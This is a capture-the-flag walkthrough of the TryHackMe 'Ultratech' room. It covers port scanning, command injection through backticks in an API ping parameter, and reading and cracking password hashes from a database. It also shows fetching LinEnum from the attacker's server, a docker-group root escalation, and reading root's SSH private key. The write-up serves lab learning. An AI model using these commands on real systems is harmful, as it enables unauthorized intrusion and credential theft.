search
Buy me a tea

TryHackMe - Ultratech

hashtag
Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.12.178 
Nmap scan report for 10.10.12.178
Host is up (0.21s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
|   256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
|_  256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
8081/tcp  open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/26%OT=21%CT=1%CU=38541%PV=Y%DS=4%DC=I%G=Y%TM=628F871
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
OS:1NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 817.68 seconds

hashtag
WFuzz on port 8081

hashtag
Task 2

  • Which software is using the port 8081? Node.js

  • Which other non-standard port is used? 31331

  • Which software using this port? Apache

  • Which GNU/Linux distribution seems to be used? Ubuntu

  • The software using the port 8081 is a REST api, how many of its routes are used by the web application? (response is found using wfuzz) 2

hashtag
Task 3

  • We have an auth endpoint that requires user and password image

  • We also have a ping endpoint but it seems to need a parameter as well image

  • We could try to pass it an ip image

  • In ctf this kind of features often leads to cmd injection so we could try a command using backticks because it takes precedence over other commands (I tried with pipes and other ways but it did not work) , and it works image

  • Let's try an ls image

  • We get the name of the db file! image

  • If we cat the fil we get password hashes for an admin and a user called r00t image

  • If crack the hash with crackstationarrow-up-right we get the password image

  • We can do the same for the admin password

hashtag
Questions

  • There is a database lying around, what is its filename? utech.db.sqlite

  • What is the first user's password hash? I will let you find it on your own

hashtag
About port 31331 - alternative way to foothold

  • We could also find things by checking the robots.txt file image

  • We discover a sitemap image

  • There is a partner page that we can not find when looking at the website. It is a login page image

  • We can check the source code and this way we discover the auth endpoint of the api image

  • We can then analyze the code of the api.js file http://10.10.12.178:31331/js/api.js image

  • This way we discover the ping endpoint http://${getAPIURL()}/ping?ip=${window.location.hostname}

hashtag
Task 4 - Privesc

  • Let's try to ssh with the found passwords. It works! image

  • Let's enumerate our ways to privesc with linenumarrow-up-right

  • We take it in our attacking machine wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh/

  • We serve it to our target with python server python3 -m http.server 80

  • We get it to our target wget http://10.13.22.56/LinEnum.sh

  • We make it executable chmod +x LinEnum.sh we have an interesting output here image

  • Let's have a look at gtfobins and search for docker, we find this(https://gtfobins.github.io/gtfobins/docker/) and we have an interesting command docker run -v /:/mnt --rm -it alpine chroot /mnt sh except instead of alpine we want to use bash

  • docker run -v /:/mnt --rm -it bash chroot /mnt sh and we get root! image

  • Let's take the chars of the root ssh key as requested in the question cat /root/.ssh/id_rsa

PreviousTryHackMe - TomghostNextTryHackMe - Vulnversity

Last updated